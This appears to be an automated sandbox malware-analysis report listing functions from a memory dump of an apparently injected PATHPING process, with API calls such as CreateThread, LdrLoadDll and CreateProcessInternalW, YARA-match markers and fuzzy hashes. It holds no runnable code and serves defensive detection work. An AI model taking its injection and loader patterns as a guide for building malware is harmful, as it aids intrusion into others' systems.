                                                                                                                        control_flow_graph 381 2bb093f-2bb095c 382 2bb095e-2bb0969 381->382 383 2bb0916-2bb0923 381->383 384 2bb096b-2bb0998 382->384 385 2bb09bd-2bb0a1a call 2bcb0a0 call 2bcbab0 call 2bb40f0 call 2ba1410 call 2bc1790 382->385 386 2bb0999 383->386 387 2bb0925-2bb093a 383->387 384->386 400 2bb0a3a-2bb0a40 385->400 401 2bb0a1c-2bb0a2b PostThreadMessageW 385->401 390 2bb09b2-2bb09bb 386->390 389 2bb093c-2bb093d 387->389 387->390 390->385 401->400 402 2bb0a2d-2bb0a37 401->402 402->400
                                                                                                                        APIs
                                                                                                                        • PostThreadMessageW.USER32(36373236,00000111,00000000,00000000), ref: 02BB0A27
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.4134567392.0000000002BA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02BA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_2ba0000_PATHPING.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: MessagePostThread
                                                                                                                        • String ID: 6276$6276I39$6276I39$I39
                                                                                                                        • API String ID: 1836367815-1925500867
                                                                                                                        • Opcode ID: 83760366172ad63d00cb8cc21084e7daa9fdc5fb84ea5f1a57955d1133d3d537
                                                                                                                        • Instruction ID: e928679a5a0df678f9a0fae58a492307cdf7ad726ca8857e21e740b193a23139
                                                                                                                        • Opcode Fuzzy Hash: 83760366172ad63d00cb8cc21084e7daa9fdc5fb84ea5f1a57955d1133d3d537
                                                                                                                        • Instruction Fuzzy Hash: F63110729443487EEF32DBA84C41DFF3BADDF95264F0488D9E550AB140D7648D038BA2
                                                                                                                        Function 02BB09B0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 60threadwindowCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                        • PostThreadMessageW.USER32(36373236,00000111,00000000,00000000), ref: 02BB0A27
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.4134567392.0000000002BA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02BA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_2ba0000_PATHPING.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: MessagePostThread
                                                                                                                        • String ID: 6276$6276I39$6276I39$I39
                                                                                                                        • API String ID: 1836367815-1925500867
                                                                                                                        • Opcode ID: 39d5e9145736cff0ae429136b68d91a502299f2eabc7a53b37ccc24501192360
                                                                                                                        • Instruction ID: 9ac2f77179b897811d9a1fcd17b911a98e1baa9c747aef475e4df5da712f617c
                                                                                                                        • Opcode Fuzzy Hash: 39d5e9145736cff0ae429136b68d91a502299f2eabc7a53b37ccc24501192360
                                                                                                                        • Instruction Fuzzy Hash: 0F01D6B1D4011C7AEB11AAE58C81DFF7B7CDF41798F0484A9FA14B7140EA745E068BB1
                                                                                                                        Function 02BA9D6A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 66threadCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                        • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02BA9DB5
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.4134567392.0000000002BA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02BA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_2ba0000_PATHPING.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateThread
                                                                                                                        • String ID: uAs$f_
                                                                                                                        • API String ID: 2422867632-1128715547
                                                                                                                        • Opcode ID: 5b8b3e83f1bbceda610b3538e20ba1c261a067cd2e3220a8a485e1b2ed340afa
                                                                                                                        • Instruction ID: 1a12152da8aea6ea88e6cdc5ead40ce6e0671f53f53281ed07ee6e608a352ef0
                                                                                                                        • Opcode Fuzzy Hash: 5b8b3e83f1bbceda610b3538e20ba1c261a067cd2e3220a8a485e1b2ed340afa
                                                                                                                        • Instruction Fuzzy Hash: EB11D37254161876D7216B989C02FDFBBADDF45710F240095F708BB2C1D7B166448BF5
                                                                                                                        Function 02BBF059 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 127COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.4134567392.0000000002BA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02BA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_2ba0000_PATHPING.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeUninitialize
                                                                                                                        • String ID: @J7<
                                                                                                                        • API String ID: 3442037557-2016760708
                                                                                                                        • Opcode ID: ee137f8af73b714ff82a3c3f103a93c57b3885613019e9ecebcd0318820593e7
                                                                                                                        • Instruction ID: 1bf3900a870a62faccb5e1d6c103986a90ef673485f3210f3c879805d6f7c7ed
                                                                                                                        • Opcode Fuzzy Hash: ee137f8af73b714ff82a3c3f103a93c57b3885613019e9ecebcd0318820593e7
                                                                                                                        • Instruction Fuzzy Hash: EB4121B6A0060AAFDB10DF98DC80DEFB7B9FF88314F108599F515A7214D771EA458BA0
                                                                                                                        Function 02BC3600 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 108sleepCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • Sleep.KERNELBASE(000007D0), ref: 02BC36DB
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.4134567392.0000000002BA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02BA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_2ba0000_PATHPING.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Sleep
                                                                                                                        • String ID: net.dll$wininet.dll
                                                                                                                        • API String ID: 3472027048-1269752229
                                                                                                                        • Opcode ID: e478fdcb05fb5a954dfe8f3ac4eb4862f94b7c61af8859837697c4da5db4bad1
                                                                                                                        • Instruction ID: 20e2abc5ed57e0d4f7e1c33d939077dcd090a83219f468cbbc25dc3c020cec52
                                                                                                                        • Opcode Fuzzy Hash: e478fdcb05fb5a954dfe8f3ac4eb4862f94b7c61af8859837697c4da5db4bad1
                                                                                                                        • Instruction Fuzzy Hash: 933170B1A01605BBD714DFA4C880FEBBBB9FF88714F5085ADE6196B240D770A640CFA4
                                                                                                                        Function 02BBF060 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 101COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.4134567392.0000000002BA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02BA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_2ba0000_PATHPING.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeUninitialize
                                                                                                                        • String ID: @J7<
                                                                                                                        • API String ID: 3442037557-2016760708
                                                                                                                        • Opcode ID: 86ccc4ffd3b8d63c553daf1c153f87be6e1111b87c16f24cefcf44685362f273
                                                                                                                        • Instruction ID: 55f0edf1b175f00a83667139e3df527c1645668b33f6c31fd2f65b5b8e66cea6
                                                                                                                        • Opcode Fuzzy Hash: 86ccc4ffd3b8d63c553daf1c153f87be6e1111b87c16f24cefcf44685362f273
                                                                                                                        • Instruction Fuzzy Hash: 37310FB5A0060AAFDB00DFD8DC809EFB7B9FF88304B108599E515AB214D775EE458BA0
                                                                                                                        Function 02BB4195 Relevance: 1.7, APIs: 1, Instructions: 169COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.4134567392.0000000002BA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02BA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_2ba0000_PATHPING.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 97e9fc485e406106bfb65abad72d185b67487cc7268d4b5fcd9bf310d2ef2faa
                                                                                                                        • Instruction ID: c7a3512f7f07cf428e3ed7af79fc89874da0dd9f126948ba4f8425c692565311
                                                                                                                        • Opcode Fuzzy Hash: 97e9fc485e406106bfb65abad72d185b67487cc7268d4b5fcd9bf310d2ef2faa
                                                                                                                        • Instruction Fuzzy Hash: 5E416872A50208ABDB16DFA4DC82BFA7BB8FF15314F0442E9E904AA142EB71D541CBD0
                                                                                                                        Function 02BB7F3D Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.4134567392.0000000002BA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02BA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_2ba0000_PATHPING.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 4391f7d931df4bb7a7e398b9f73645a47c9e04c5ba706bc6840e833f387c2844
                                                                                                                        • Instruction ID: 03216314c0ca9f1efe4c1a8b435df1626d09011ab7c3d89baf0448416c64cef0
                                                                                                                        • Opcode Fuzzy Hash: 4391f7d931df4bb7a7e398b9f73645a47c9e04c5ba706bc6840e833f387c2844
                                                                                                                        • Instruction Fuzzy Hash: 5F11B1321052814FD7139A38884D2F5FBA4DF82228B180BDDC4E0CF6E7D76285169240
                                                                                                                        Function 02BB40E3 Relevance: 1.6, APIs: 1, Instructions: 52libraryloaderCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 02BB4162
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.4134567392.0000000002BA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02BA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_2ba0000_PATHPING.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Load
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2234796835-0
                                                                                                                        • Opcode ID: fec0760840a81a1cfc29dba25679e0d068e121a6b38d6e3e87c4cfae0b4f1189
                                                                                                                        • Instruction ID: 8ed4d33bee74fa3d740c731035811c862f78346b35400619836206b3420586e0
                                                                                                                        • Opcode Fuzzy Hash: fec0760840a81a1cfc29dba25679e0d068e121a6b38d6e3e87c4cfae0b4f1189
                                                                                                                        • Instruction Fuzzy Hash: DB019EB5E0010DA7DB10EBA4ED42FEDB7B9EB54308F108299E91CA7240F270DA188B51
                                                                                                                        Function 02BB40F0 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 02BB4162
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.4134567392.0000000002BA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02BA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_2ba0000_PATHPING.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Load
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2234796835-0
                                                                                                                        • Opcode ID: 5b7e103240ded1459ada72a1c913c8d9925025acccbb9aa8914370982d61623b
                                                                                                                        • Instruction ID: be7230581746da7442d3b40b454e276813928050f0a2147f0e611e1736531117
                                                                                                                        • Opcode Fuzzy Hash: 5b7e103240ded1459ada72a1c913c8d9925025acccbb9aa8914370982d61623b
                                                                                                                        • Instruction Fuzzy Hash: 9C0112B5E0010DABDB10DBA4DC41FEDB779AF54308F1041D9E908A7241F671EB548B51
                                                                                                                        Function 02BC9340 Relevance: 1.5, APIs: 1, Instructions: 47processCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CreateProcessInternalW.KERNELBASE(?,?,?,?,02BB7E9E,00000010,?,?,?,00000044,?,00000010,02BB7E9E,?,?,?), ref: 02BC93A3
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.4134567392.0000000002BA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02BA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_2ba0000_PATHPING.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateInternalProcess
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2186235152-0
                                                                                                                        • Opcode ID: 5c8074bed1560fbd93ead97a32b0684ce64102b7d9385dde0331ac63bc875bb8
                                                                                                                        • Instruction ID: 7477db381d7e855a3d573ab40a676dc2f25312f68cfa9b964e8d4b634d3565dd
                                                                                                                        • Opcode Fuzzy Hash: 5c8074bed1560fbd93ead97a32b0684ce64102b7d9385dde0331ac63bc875bb8
                                                                                                                        • Instruction Fuzzy Hash: FC01C0B2214208BFCB44DE89DC80EEB77ADAF8C714F508108BA09E3241DA30F8518BA4
                                                                                                                        Function 02BA9D70 Relevance: 1.5, APIs: 1, Instructions: 38threadCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02BA9DB5
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.4134567392.0000000002BA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02BA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_2ba0000_PATHPING.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateThread
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2422867632-0
                                                                                                                        • Opcode ID: 29ec8f44c87a5c2276cf537b4053dce362a942dfa3fde41dce95c11157800647
                                                                                                                        • Instruction ID: 41f72c265219e2c2f5310acce6807eaa8351478b19b1c82a73f4f5d492577b85
                                                                                                                        • Opcode Fuzzy Hash: 29ec8f44c87a5c2276cf537b4053dce362a942dfa3fde41dce95c11157800647
                                                                                                                        • Instruction Fuzzy Hash: DAF06D733956043AE22065AD9C02FDBB78DCB80BB1F24046AFB0CEB2C1D9A2B44146A5
                                                                                                                        Function 02BB4170 Relevance: 1.5, APIs: 1, Instructions: 31libraryloaderCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 02BB4162
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.4134567392.0000000002BA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02BA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_2ba0000_PATHPING.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Load
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2234796835-0
                                                                                                                        • Opcode ID: af889453b085852eccb278b9c7a2561df7d0aadd69b1b6e10842e4ddd5654ea4
                                                                                                                        • Instruction ID: 9c0a3e047feb48522d6ca0fa236ee22ffc75f60be32c580b9554f662d022f38a
                                                                                                                        • Opcode Fuzzy Hash: af889453b085852eccb278b9c7a2561df7d0aadd69b1b6e10842e4ddd5654ea4
                                                                                                                        • Instruction Fuzzy Hash: 1CF030B9D0010DBBDB10DA98DC41FEBBBB8EF45608F108194E958A6241E670EA55CBA1
                                                                                                                        Function 02BB416C Relevance: 1.5, APIs: 1, Instructions: 31libraryloaderCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 02BB4162
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.4134567392.0000000002BA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02BA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_2ba0000_PATHPING.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Load
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2234796835-0
                                                                                                                        • Opcode ID: faa19c80f4feba2061a74ca3ae79c91efa0461eacaa1439af41494dbf367e914
                                                                                                                        • Instruction ID: f5ea9506579dcb5892e83d5e10025ef7c339235a4cfb88c369a9c086863996ef
                                                                                                                        • Opcode Fuzzy Hash: faa19c80f4feba2061a74ca3ae79c91efa0461eacaa1439af41494dbf367e914
                                                                                                                        • Instruction Fuzzy Hash: EAF0A0B5E0010DBBDB10DE94DC41FFEBB78EF45218F1082A8E908A6201E331DA15CB90
                                                                                                                        Function 02BC92B0 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • RtlFreeHeap.NTDLL(00000000,00000004,00000000,8BFC4589,00000007,00000000,00000004,00000000,02BB39D6,000000F4), ref: 02BC92EF
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.4134567392.0000000002BA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02BA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_2ba0000_PATHPING.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: FreeHeap
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3298025750-0
                                                                                                                        • Opcode ID: f704647b0a7c45a6b5859f8aa2176ba2dd169f799a595d2c976edf9410cb87cf
                                                                                                                        • Instruction ID: 52dd4168256a5622d260e229dcdf4210c94bacadd5030cc2f2bceff945d3bbd7
                                                                                                                        • Opcode Fuzzy Hash: f704647b0a7c45a6b5859f8aa2176ba2dd169f799a595d2c976edf9410cb87cf
                                                                                                                        • Instruction Fuzzy Hash: A5E065B2200208BFEA10EE59DC40FAB37ADEFC9720F004018F90CA7242CA70B9118AB4
                                                                                                                        Function 02BC9260 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • RtlAllocateHeap.NTDLL(02BB1649,?,02BC527F,02BB1649,02BC51DF,02BC527F,?,02BB1649,02BC51DF,00001000,?,?,00000000), ref: 02BC929F
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.4134567392.0000000002BA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02BA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_2ba0000_PATHPING.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocateHeap
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1279760036-0
                                                                                                                        • Opcode ID: 91884bb2f0ac8af9a4aa6ea0de853ea0b7eac79e40581915d80249b308c900df
                                                                                                                        • Instruction ID: ec74454b97c9720a4bee86f005268ca5fe8ae55014d580679202c5775eb33905
                                                                                                                        • Opcode Fuzzy Hash: 91884bb2f0ac8af9a4aa6ea0de853ea0b7eac79e40581915d80249b308c900df
                                                                                                                        • Instruction Fuzzy Hash: 44E065B6210308BFE610EE5ADC84F9B37ADEFC9720F004008FA08A7241DA30B8108BB4
                                                                                                                        Function 02BB7EE0 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetFileAttributesW.KERNELBASE(?), ref: 02BB7F0C
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.4134567392.0000000002BA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02BA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_2ba0000_PATHPING.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AttributesFile
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3188754299-0
                                                                                                                        • Opcode ID: 53d29c82f52b957d9f67e65202dd129e0b91a26103301d23a613c35b2bc8e6ec
                                                                                                                        • Instruction ID: 1058a17d8e48c64040fbaa749f32788804d5a71178097f6bebc4b6a3912a1827
                                                                                                                        • Opcode Fuzzy Hash: 53d29c82f52b957d9f67e65202dd129e0b91a26103301d23a613c35b2bc8e6ec
                                                                                                                        • Instruction Fuzzy Hash: ACE020721602042BF7205A68DC49FB5335DCF84724F684AA0F81CDB5C1EA74F4014154
                                                                                                                        Function 02BB7ED9 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetFileAttributesW.KERNELBASE(?), ref: 02BB7F0C
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.4134567392.0000000002BA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02BA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_2ba0000_PATHPING.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AttributesFile
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3188754299-0
                                                                                                                        • Opcode ID: bcda1792175244ccc46f8540d3439c88d9e62693d137ea7d247dc54d411d73a5
                                                                                                                        • Instruction ID: 072220630798f6e1d571ddcac5481ce190011d22c4d0c16c284d91757bb995c3
                                                                                                                        • Opcode Fuzzy Hash: bcda1792175244ccc46f8540d3439c88d9e62693d137ea7d247dc54d411d73a5
                                                                                                                        • Instruction Fuzzy Hash: 35E020722503442FF7205E5CCC49FB53359CF84729F684A90F818EB5C1DA75F5014654
                                                                                                                        Function 02BB7CD0 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SetErrorMode.KERNELBASE(00008003,?,?,02BB1940,02BC7B1F,02BC51DF,02BB1906), ref: 02BB7D03
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.4134567392.0000000002BA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02BA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_2ba0000_PATHPING.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorMode
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2340568224-0
                                                                                                                        • Opcode ID: 5f88bc61a3014c15c064a01038728c29e2d6e49de9f991d3aa44fa949bf6a591
                                                                                                                        • Instruction ID: 3c219adddf1ee23d9ab1bf78413182cc5e60fd17b590dea7d4dd3f21e94076ed
                                                                                                                        • Opcode Fuzzy Hash: 5f88bc61a3014c15c064a01038728c29e2d6e49de9f991d3aa44fa949bf6a591
                                                                                                                        • Instruction Fuzzy Hash: 27D05EB22913043BF641A6A98C07F6636AD8B40795F0984A5F91CEB2C2FD75E0004A65
                                                                                                                        Function 03682C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.4135962637.0000000003610000.00000040.00001000.00020000.00000000.sdmp, Offset: 03610000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.4135962637.0000000003739000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.4135962637.000000000373D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.4135962637.00000000037AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_3610000_PATHPING.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        • Opcode ID: c4f3c2863d014a3958382653cb9112c9e2ee2117fc39c181f91ddfca50b32c4c
                                                                                                                        • Instruction ID: b1038076773bb1733bbe7455a6c1bae53fa74b5b2f7b6851fac91eac14344ec8
                                                                                                                        • Opcode Fuzzy Hash: c4f3c2863d014a3958382653cb9112c9e2ee2117fc39c181f91ddfca50b32c4c
                                                                                                                        • Instruction Fuzzy Hash: 8AB09B719015C5C5EE51F7604708717790467D1701F19C562D2034755F4779C1D1E175

                                                                                                                        Non-executed Functions

                                                                                                                        Function 035004DE Relevance: .1, Instructions: 149COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.4135867710.0000000003500000.00000040.00000800.00020000.00000000.sdmp, Offset: 03500000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_3500000_PATHPING.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 5980dba0d7954c9c78fefc854ded5a613155a8df57f772f151d519c62611a94d
                                                                                                                        • Instruction ID: 86d225af801b4051feac6be55072df3b5bb8e976e1469f111b9992e27ee145ae
                                                                                                                        • Opcode Fuzzy Hash: 5980dba0d7954c9c78fefc854ded5a613155a8df57f772f151d519c62611a94d
                                                                                                                        • Instruction Fuzzy Hash: 8441E574518F0A4FD368EFA8E081776F3E1FB85300F54462DD986C76A2EA71E8428685
                                                                                                                        Function 0350DEC9 Relevance: 57.7, Strings: 46, Instructions: 222COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.4135867710.0000000003500000.00000040.00000800.00020000.00000000.sdmp, Offset: 03500000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_3500000_PATHPING.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                                                                                        • API String ID: 0-3754132690
                                                                                                                        • Opcode ID: 1b334d22ca8f35166475ef0e57b6c0bf2ed59f2c579f69a47e29a63819b07711
                                                                                                                        • Instruction ID: 67102c953c41bcbeff460ec19b3a75f87eddf1804817c9c45de4c6e204659ad4
                                                                                                                        • Opcode Fuzzy Hash: 1b334d22ca8f35166475ef0e57b6c0bf2ed59f2c579f69a47e29a63819b07711
                                                                                                                        • Instruction Fuzzy Hash: 5A914FF04482988AC7158F54A0612AFFFB5EBC6305F15856DE7E6BB243C3BE8905CB85
                                                                                                                        Function 03682890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.4135962637.0000000003610000.00000040.00001000.00020000.00000000.sdmp, Offset: 03610000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.4135962637.0000000003739000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.4135962637.000000000373D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.4135962637.00000000037AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_3610000_PATHPING.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ___swprintf_l
                                                                                                                        • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                        • API String ID: 48624451-2108815105
                                                                                                                        • Opcode ID: aff2eed27b6480ae51531a98fc2b5d77757258110f2a1af50cd82fce1a981636
                                                                                                                        • Instruction ID: 29b18ebc54c309e5da7af66f636932925254263e3acdde296a393d2a5a80dc8e
                                                                                                                        • Opcode Fuzzy Hash: aff2eed27b6480ae51531a98fc2b5d77757258110f2a1af50cd82fce1a981636
